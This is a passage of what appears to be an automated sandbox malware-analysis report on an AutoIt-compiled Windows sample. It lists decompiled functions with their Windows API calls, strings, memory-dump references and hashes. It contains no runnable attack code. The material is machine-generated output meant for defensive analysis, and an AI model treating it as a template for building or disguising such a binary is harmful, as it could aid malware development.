                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3380330463-3941886329
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1143807570-3662162768
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1787419579
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: htonsinet_addr
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
